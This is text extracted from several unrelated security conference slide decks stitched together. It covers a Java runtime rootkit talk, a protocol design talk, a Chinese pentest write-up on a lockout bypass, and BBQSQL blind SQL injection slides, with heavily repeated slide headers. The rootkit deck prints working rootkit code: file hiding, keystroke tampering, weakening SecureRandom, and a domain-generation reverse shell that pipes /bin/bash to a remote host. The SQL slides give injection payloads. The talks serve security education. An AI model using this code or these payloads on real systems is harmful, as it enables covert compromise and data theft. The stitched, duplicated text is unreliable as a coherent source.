Students Eat [http://www.huffingtonpost.com/2011/05/11/texas-calorie- camera_n_860771.html] School-Webcam Spy Scandal Resurfaces [http://www.wired.com/threatlevel/2011/06/webcam-scandal-resurfaces/] Cell phone measure targets ID theft threat [http://www.pittsburghlive.com/x/pittsburghtrib/news/cityregion/s_509880.html] U.S. Faces Legal Challenge to Internet-Domain Seizures [http://www.wired.com/threatlevel/2011/06/domain-seizure-challenge/] Judge Who Doesn't Understand Technology Says WiFi Is Not A Radio Communication [http://www.techdirt.com/blog/wireless/articles/20110701/12225114934/judge-who-doesnt-understand-technology-says-wifi- is-not-radio-communication.shtml] Note • For the most up-to-date version of these slides, please visit [http://www.scribd.com/theprez98] WTF Happened to the Constitution?! The Right to Privacy in the Digital Age Michael “theprez98” Schearer DEFCON 19 Las Vegas, NV
Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Benjamin Holland (daedared) ben-holland.com DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Developing Managed Code Rootkits for the Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A $ whoami Benjamin Holland (daedared) B.S. in Computer Engineering (2005 - 2010) Wabtec Railway Electronics, Ames Lab, Rockwell Collins B.S. in Computer Science (2010 - 2011) M.S. in Computer Engineering and Information Assurance (2010 - 2012) MITRE Iowa State University Research (2012 - 2015) DARPA Automated Program Analysis for Cybersecurity (APAC) Program PhD in Computer Engineering (2015-????) DARPA Space/Time Analysis for Cybersecurity (STAC) Program DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Background DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hello World DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Java Runtime Environment DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Managed Code Rootkits (MCRs) Post exploitation activity (need root/administrator privileges) C:\Program Files\Java\. . . \lib\rt.jar Compromises EVERY program using the modified runtime Out of sight out of mind Code reviews/audits don’t typically audit runtimes May be overlooked by forensic investigators Rootkits can be platform independent Runtimes are already fully featured Object Oriented programming Standard libraries Additional access to low level APIs (key events, networking, etc.) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pioneering Work Pioneering work by Erez Metula (DEFCON 17) Explored implications of MCRs "ReFrameworker" tool to modify .NET runtimes XML modules to define manipulation tasks Uses an assembler/disassembler pair to make modifications Generates deployment scripts DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Strategies for Modifying the Runtime DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Strategies for Modifying the Runtime DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A New Framework Goals MCR support for Java Runtime Environment Minimal prerequisite user knowledge No knowledge of bytecode or intermediate languages Simple development cycle Consider: developing, debugging, deploying Strive towards portability (Write Once, Exploit Everywhere) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A JReFrameworker DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A JReFrameworker Write rootkits in Java source! Modification behaviors defined with code annotations Develop and debug in Eclipse IDE Exploit "modules" are Eclipse Java projects Exportable payload droppers Bytecode injections are computed on the fly Free + Open Source (MIT License): github.com/JReFrameworker DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A JReFrameworker Write rootkits in Java source! Modification behaviors defined with code annotations Develop and debug in Eclipse IDE Exploit "modules" are Eclipse Java projects Exportable payload droppers Bytecode injections are computed on the fly Free + Open Source (MIT License): github.com/JReFrameworker DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hello World Revisited @MergeType public class BackwardsPrintStream extends java.io.PrintStream { @MergeMethod @Override public void println(String str){ StringBuilder sb = new StringBuilder(str); super.println(sb.reverse().toString()); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Annotation Types DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Annotation Types DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Annotation Types DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Modules DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Get Creative Time to get creative... DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hidden File @MergeType public class HiddenFile extends java.io.File { @MergeMethod @Override public boolean exists(){ if(isFile() && getName().equals("secretFile")){ return false; } else { return super.exists(); } } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hidden File DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Hidden File DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Beetlejuice @MergeType public class BeetlejuicePS extends java.io.PrintStream { @DefineField private int beetlejuice; @MergeMethod public void println(String str){ StackTraceElement[] st = new Exception().getStackTrace(); for(StackTraceElement element : st){ if(element.getMethodName().equals("beetlejuice")){ if(++beetlejuice==3) i.Main.main(new String[]{}); super.println(str); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Beetlejuice public class Test { static class TimBurton {} public static void main(String[] args) { TimBurton timBurton = new TimBurton(); beetlejuice(timBurton); beetlejuice(timBurton); beetlejuice(timBurton); } private static void beetlejuice(TimBurton timBurton){ System.out.println(timBurton.toString()); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Beetlejuice The “i.Main.main(new String[]);” invokes Mocha DOOM Port of DOOM shareware to pure Java github.com/AXDOOMER/mochadoom Payload behaviors can depend on the state or structure of the client program DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Mutable Strings public static void main(String[] args) { String demand = "sacrifice"; demand.replace("sacrifice", "puppy"); System.out.println("Satan demands a " + demand + "!"); } Immutable: demand="sacrifice" Mutable: demand="puppy" DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Mutable Strings @DefineTypeFinality(finality=false) @DefineFieldFinality(field="value", finality=false) @DefineFieldVisibility(field="value", visibility="protected") @MergeType public class MutableString extends java.lang.String { @MergeMethod public String replace(CharSequence s1, CharSequence s2){ String result = super.replace(s1, s2); // hey Java you forgot to update your value...so I fixed it :) value = result.toCharArray(); return result; } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images @MergeType public class PixelatedBufferedImage extends BufferedImage { @DefineField boolean pixelated = false; @MergeMethod public Graphics getGraphics() { if(!pixelated) setData(pixelate(getData())); return super.getGraphics(); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images (5x pixel size) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images (10x pixel size) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images (25x pixel size) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pixelated Images (50x pixel size) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Decreasing Productivity Define SpellWrecker class (inverse of a spellchecker) As average typing speed increases, more typos are injected As average typing speed reduces, less typos are injected @MergeType public class SpellWreckedKeyEvent extends KeyEvent { @MergeMethod @Override public char getKeyChar(){ char original = super.getKeyChar(); return SpellWrecker.spellwreck(original); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A CVE-2012-4681 Applet can bypass security restrictions to execute arbitrary code Combination of two vulnerabilities Excellent reliability, multi platform “Gondvv” exploit found in the wild (August 2012) PoC Exploit: http://pastie.org/4594319 Metasploit Module: exploit/multi/browser/java_jre17_exec Detailed analysis by Immunity Products DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A CVE-2012-4681 (Exploit Armoring Experiment) Source: github.com/benjholla/CVE-2012-4681-Armoring Submitted to VirusTotal 2 years after found in the wild. . . DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A CVE-2012-4681 (Exploit Armoring Experiment) Source: github.com/benjholla/CVE-2012-4681-Armoring Submitted to VirusTotal 4 years after found in the wild. . . DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A CVE-2012-4681 (“The Reverse Bug Patch”) “Unfixing” CVE-2012-4681 in Java 8 com.sun.beans.finder.ClassFinder Remove calls to ReflectUtil.checkPackageAccess(. . . ) com.sun.beans.finder.MethodFinder Remove calls to ReflectUtil.isPackageAccessible(. . . ) sun.awt.SunToolkit Restore getField(...) method Unobfuscated vulnerability gets 0/56 on VirusTotal What’s the difference between vulnerabilities and exploits? DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A SCADA HMI Application Modifications If you can modify a runtime, you can modify an application... Example: SCADA HMI application DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A SCADA HMI Application Modifications Original HMI application lacks modern security mechanisms Challenge: Can we enhance the security for “alarms” list without access to the source code? DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A SCADA HMI Application Modifications Backend server enhanced with an application firewall Firewall supports new security policy mechanisms (e.g. two factor authentication) HMI client UI enhanced with prompts for firewall challenge responses DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Mitigations DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Bytecode Modification Indicators What is wrong with this picture? (hint: look at the line numbers) DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Bytecode Modification Indicators File hash File size (original: ~50mb, modified: ~25mb) “jref_” method rename prefix (can be changed in preferences) Class/Method/Field counts Code metrics (e.g. cyclomatic complexity) . . . DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Being Aware JReFrameworker is an awareness project! DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Q/A DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Still plenty of work to do. . . The woods are lovely, dark and deep, But I have promises to keep, And miles to go before I sleep, And miles to go before I sleep. -Robert Frost DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Questions? Thank you! JReFrameworker: Setup + Tutorials: jreframeworker.com Source Code: github.com/JReFrameworker References: github.com/JReFrameworker/JReFrameworker/blob/master/REFERENCES.md Additional Resources Managed Code Rootkits: appsec-labs.com/managed_code_rootkits ASM Transformations Whitepaper: asm.ow2.org/current/asm-transformations.pdf DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A The JVM isn’t just for Java JVM Specific Java, Scala, Clojure, Groovy, Ceylon, Fortess, Gosu, Kotlin. . . Ported Languages JRuby, Jython, Smalltalk, Ada, Scheme, REXX, Prolog, Pascal, Common LISP. . . DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pokémon! Gotta Hack em’ All! Application contains callbacks for special premium bracelet notifications Just need to add tactile feedback to user Slightly more complicated toolchain for modifying Android apps .apk -> APKTool -> Dex2Jar -> JReFrameworker -> DX -> APKTool -> .apk DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Pokémon! Gotta Hack em’ All! @MergeType public class NotifyLegendaryPokemon extends com.nianticproject.holoholo.sfida.unity.SfidaUnityPlugin { @MergeMethod public boolean notifySpawnedLegendaryPokemon(String param){ vibrate(); return super.notifySpawnedLegendaryPokemon(param); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A DEFCON Inspirations It is truly an honor to be here Early memories of reading Winn Schwartau’s Information Warfare One of my first introductions to security topics This talk itself was inspired by a previous DEFCON talk DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Reverse Shell + DGA Malicious client probes for payload Create a reverse shell to the domain of the day public static void main(String[] args) throws Exception { Date d = new Date(); // attempts to invoke a private method named reverseShell // in java.util.Date that may or may not exist ;) Method method = d.getClass().getDeclaredMethod("reverseShell"); method.setAccessible(true); method.invoke(d); } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Reverse Shell + DGA public class java.util.Date { private void reverseShell(){ String domain = "www."; int year = getYear(); int month = getMonth(); int day = getDay(); for(int i=0; i<16; i++){ year = ((year ^ 8 * year) >> 11) ^ ((year & 0xFFFFFFF0) << 17); month = ((month ^ 4 * month) >> 25) ^ 16 * (month & 0xFFFFFFF8); day = ((day ^ (day << 13)) >> 19) ^ ((day & 0xFFFFFFFE) << 12); domain += (char)((Math.abs((year ^ month ^ day)) % 25) + 97); } domain += ".com"; ... DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Reverse Shell + DGA Define a java.util.StreamForwarder class Forward shell inputs/outputs to TCP stream InetAddress address = InetAddress.getByName(domain); String ipAddress = address.getHostAddress(); final Process process = Runtime.getRuntime().exec("/bin/bash"); Socket socket = new Socket(ipAddress, 6666); forwardStream(socket.getInputStream(), process.getOutputStream()); forwardStream(process.getInputStream(), socket.getOutputStream()); forwardStream(process.getErrorStream(), socket.getOutputStream()); process.waitFor(); ... DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment Developing Managed Code Rootkits for the Java Runtime Environment $ whoami Background JReFrameworker Modules Mitigations Q/A Downgrading Security @MergeType public class InsecureRandom extends SecureRandom { @DefineField private Random random; @MergeMethod public int nextInt(){ if(random == null){ random = new Random(0 /* fixed seed */); } return random.nextInt(); } } DEFCON 24, August 6th 2016 Developing Managed Code Rootkits for the Java Runtime Environment
Utu: Saving The Internet With Hate The Grand Experiment ● An experiment in sociology and computing Philosophical Foundations ● Strong Identity ● Reputation ● Retribution Identity ● Nobody knows how you are on the internet. Reputation ● But, they know you're a dickhead. Retribution ● And, wouldn't it be great to punish the dickheads? Technical Solutions to Social Problems ● If it goes on the Interwebs, it's social. The Protocol ● Sends 2 bytes for size (htons(size)) ● Sends the data structure ● That's it. Framing, Lexemes, Grammar ● Uses stackish, an XML joke. ● Google for it. ● S-expressions with netstrings in a FORTH stack order. ● [ [ '4:test' 1234 child root ● (root (child (1234 '4:test'))) Semantics ● Determined by the Hub. ● One Stackish node for header. ● Another for body. Data Encoding ● Always ASCII text, but you can put anything you want in BLOBs. Simplicity Is Key ● 2 bytes for frame ● Stackish for header and body ● Easy to implement Security Preventions ● Client does all the work first. ● Client is considered hostile. ● Booted immediately. ● A Finite State Machine controls. The Cryptography I'M NOT A CRYPTOGRAPHER ● I didn't write any crypto ● Followed the rules Standards Used ● AES 32-byte (256 bits) ● ECC 32-byte (256 bits) ● SHA256 hashes ● 128 bit random nonces ● ISO/IEC 11770-3 Mechanism 6 without the Helsinki vulnerability ● CCM based encryption with AAD ● Fortuna PRNG Implementations ● utuprotocol.info for server ● ihate.rubyforge.org for client Secure Coding Practices Valgrind, Valgrind, Valgrind ● All code is ruthlessly run through it. ● Uh, except you can't run ruby through it. ● Sigh, ruby sucks. Statistical Quality Control ● Collect information on – Valgrind errors – Unit test errors – Logged Errors ● Analyze the change over time Code Auditing ● Review my code repeatedly. ● Consistent “rules” I follow ● Assume it's always broken C Coding Practices ● Bstring library for strings ● All functions have validations – Assert – preconditions/postconditions – Extensive unit testing Secure Unix Server Practices ● Always chroot. ALWAYS. ● Leave minimum resources open. ● Minimum configuration. Practical Demonstration Current Security Flaws ● Messages are numbered sequentially ● No versioning on packets ● Cryptography Not Evaluated Feedback and Questions Call For Assistance ● Entirely GPLv3 Code ● Open and contributions welcome ● savingtheinternetwithhate.com ● ihate.rubyforge.org
一次诡异的弱口令 0x01 背景 某次客户授权渗透碰到的问题,比较有趣,分享一下。 项目开始没多久,一起的小姐妹说存在弱口令admin/admin,让我试试。然而在我尝试登录的时候,返 回消息为“密码错误,失败次数为1”。这没法登录,密码不对阿,还有账号锁定机制。 继续测试,发现登录页面验证码在使用后未作失效处理,正常操作,爆破一下。 burp的结果显示四五个账号存在弱口令,手动验证下,只有两个账号使用密码正常登录了,其他账号都 返回密码错误的消息。 弱口令登录不能复现,非常诡异,讲给客户估计会被客户加开发一起喷死,于是我就请教了一下我大 哥。 大哥如此清新脱俗的解释,一直喊666的我,灵魂在吹牛逼的过程中莫然得到了一丝的愉悦。然而作为 打工人,想了想午饭的馒头还没有着落,只能埋头继续肝! 0x01 剥茧抽丝 shell手法,平平无奇,标准操作过了下WAF的内容检测,此处不做赘述,直奔登录模块拿到对应class文 件。 class文件导入jd-gui,好了,可以下打死开发了。 bingo,破案! 浏览器启动,admin账户到位,输入若干次口令直到账号锁定,等待一段时间,待锁定时间过后输入 admin、任意密码成功登陆了系统。 0x02 修复方式 显然,开发小哥写的代码太绕了,把自己绕进去了。 针对上述的写法,在state为2后,锁定一段时间。再次登录账户解锁之后,还需要再校验密码,而不是 直接返回true。 0x03 总结 账户锁定的情况也可以多试几次,既然是账号锁定功能,时间也应该是测试参数。正如老话说,时间是 最好的解药。
BBQSQL Ben Toews Scott Behrens Who are we? ● Ben Toews ○ Security Consultant / Researcher at Neohapsis ● Scott Behrens ○ Security Consultant / Researcher at Neohapsis Why are we here? ● BBQSQL ○ New dog, old trick ■ Exploits Blind SQL Injection ○ New dog, new trick ■ Fast ■ Easy ■ Gets those hard to reach spots SQL What? ● Structured Query Language (SQL) ○ Language for interacting with database ● SQL Injection ○ Inject syntax into an application's SQL queries Basic SQL Injection Normal Case: UNAME = "mastahyeti" PASS = "s3cret" QUERY = "select * from users where pass=md5 ('"+PASS+"') and uname='"+UNAME+"'"; QUERY evaluates to: select * from users where pass=md5('secret') and uname='mastahyeti' Basic SQL Injection SQL Injection Case: UNAME = "pwned' or '1'='1"; PASS = "pwned"; QUERY = "select * from users where pass=md5 ('"+PASS+"') and uname='"+UNAME+"'"; QUERY evaluates to: select * from users where pass=md5('pwned') and uname='pwned' or '1'='1' Blind SQL Injection ● Still trying to alter SQL syntax ● Dumping database ● More complex SQL syntax Blind SQL Injection Blind SQL Injection Case: UNAME = "' or (ASCII(SUBSTR(SELECT user(), 1,1))>63) --"; PASS = ""; QUERY = "select * from users where pass=md5 ('"+PASS+"') and uname='"+UNAME+"'"; QUERY evaluates to: select * from users where pass=md5('') and uname='' or (ASCII(SUBSTR(SELECT user(), 1,1))>63) --' Blind SQL Injection select * from users where pass=md5('') and uname='' or ( ASCII( << char -> int SUBSTR( << slice string SELECT user() << current user ,1,1) << first char )>63 << 63 = '?' ) --' << comment Blind SQL Injection ● Binary (or other) search for each character ● One character at a time ● Time consuming Blind SQL Injection ● Lots of excellent tools out there ○ sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ... ● Lots of great features ^^^^^^ good job guys... ● If these tools don't work ○ You end up writing a custom script, test, debug, test, debug... ● What if there was a way to simplify tricky Blind SQL Injection attacks... BBQSQL:Use doesn't care about your data! doesn't care about your database! + = Images from http://www.freedigitalphotos.net/ BBQSQL ● Exploits Blind SQL Injection ● For those hard to reach spots ● Semi-automatic ● Database agnostic ● Versatile ● Fast ● Fast ● Did we mention it is fast? BBQSQL:Use ● Must provide the usual information ○ URL ○ HTTP Method ○ Headers ○ Cookies ○ Encoding methods ○ Redirect behavior ○ Files ○ HTTP Auth ○ Proxies ○ ... BBQSQL:Use ● Provide two additional pieces of info ○ Specify where the injection goes ○ Specify what syntax we are injecting BBQSQL:Use ● The injection can go ANYWHERE: ○ url => "http://google.com?vuln='${query}" ○ data => "user=foo&pass=${query}" ○ cookies => {'PHPSESSID':'123123','FOO':'BAR${query}'} ● doesn't understand data doesn't care about your annoying: ■ serialization format ■ processes and rules ■ encodings BBQSQL:Use ● The query specifies how to do binary search: ○ query => "' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}), ${char_index:1}, 1))${comparator:>}${char_val:0} #" ● Database agnostic ● Doesn't care about your annoying: ○ SQL syntax ○ Charset limitations ○ IDS/IPS BBQSQL:Use Demo? Images from http://gossipsucker.com/ BBQSQL:Speed ● Concurrent HTTP requests ● Multiple search algorithms ○ Binary search ○ Frequency based search BBQSQL:Speed ● Concurrent HTTP requests ● Multiple search algorithms ○ Binary search ○ Frequency based search BBQSQL:grequests grequests = gevent + requests BBQSQL:grequests grequests = gevent + requests BBQSQL:gevent "gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop" -http://gevent.org BBQSQL:gevent ● Coroutine ~ function ● You spawn many simultaneous coroutines ● Only one runs at a time ● When a coroutine encounters blocking (network IO) it yields and allows the next coroutine to run while it waits ● This forms an event-loop ● Functionally, it appears to act like threading BBQSQL:grequests grequests = gevent + requests BBQSQL:requests "HTTP For Humans" -docs.python-requests.org ● Awesome HTTP API built on top of urllib3 in Python ● Written/maintained by Kenneth Reitz ○ API designing badass BBQSQL:grequests grequests = gevent + requests BBQSQL:grequests Good Evented HTTP for Python BBQSQL:Speed ● Concurrent HTTP requests ● Multiple search algorithms ○ Binary search ○ Frequency based search BBQSQL:Binary Search 1 2 3 4 5 6 7 8 9 10 11 12 7 8 9 10 11 12 7 8 9 10 7 8 9 10 8 Average Case: O(log(n)) BBQSQL:Speed ● Concurrent HTTP requests ● Multiple search algorithms ○ Binary search ○ Frequency based search BBQSQL:Linear Search 1 2 3 4 5 6 7 8 9 10 11 12 1 2 3 4 5 6 7 8 9 10 11 12 1 2 3 4 5 6 7 8 9 10 11 12 1 2 3 4 5 6 7 8 9 10 11 12 Average Case: O(n/2) ... BBQSQL:Frequency ● Analysed lots of books, source code, CCs, SSNs :P ● Most common characters are [' ', 'e', 't', 'o', 'a'] ● Most likely characters to follow 'e' are [' ', 'r', 'n'] BBQSQL:Frequency ● Very fast against non-entropic data: ○ English ■ ~10 requests/character ○ Python ■ ~8 requests/character ○ Credit card numbers ■ ~5.5 requests/character ● VS. binary search ○ English ■ ~12 requests/character BBQSQL:UI ● UI is built using source from Social Engineering Toolkit(SET) ○ Thanks Dave (ReL1K) Kennedy! ● Input validation is performed on each configuration option in real time to prevent snafu ○ You don't have to wait till you type up a huge request on the CLI and find out your 600 char POST data is malformed! BBQSQL:UI ● Configuration files can be imported and exported through UI or CLI ○ Uses ConfigParser so easy to work with ● Can export attack results as CSV file Credits ● Wikipedia (math is hard) ● Neohapsis Labs ● Image links are embedded in presentation ● ReL1K - SET https://www.trustedsec.com/downloads/social- engineer-toolkit/ Thanks Ben Toews - @mastahyeti Scott Behrens - @helloarbit Neohapsis(.com) << Hiring << bonus4us BBQSQL github.com/neohapsis/bbqsql
